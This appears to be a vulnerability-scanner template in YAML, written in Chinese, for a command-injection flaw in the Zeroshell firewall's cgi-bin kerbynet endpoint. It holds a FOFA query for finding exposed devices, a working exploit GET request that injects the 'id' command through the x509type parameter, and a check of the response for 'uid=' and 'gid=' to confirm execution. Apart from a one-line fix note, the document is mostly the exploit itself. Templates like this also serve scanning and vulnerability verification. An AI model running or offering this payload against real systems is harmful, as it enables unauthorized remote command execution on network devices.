product: Zeroshell防火墙
vName: Zeroshell防火墙 cgi-bin-kerbynet 命令执行
type: 命令执行
vID: [ ]
level: 3
vDesc: ''
version: ''
note: ''
search:
  FOFA: app="Zeroshell-防火墙"
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: "/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0Aid%0A'"
    verify:
      logic: and
      check:
        - body:
            value:
              - uid=
              - gid=
            logic: and
          status: 200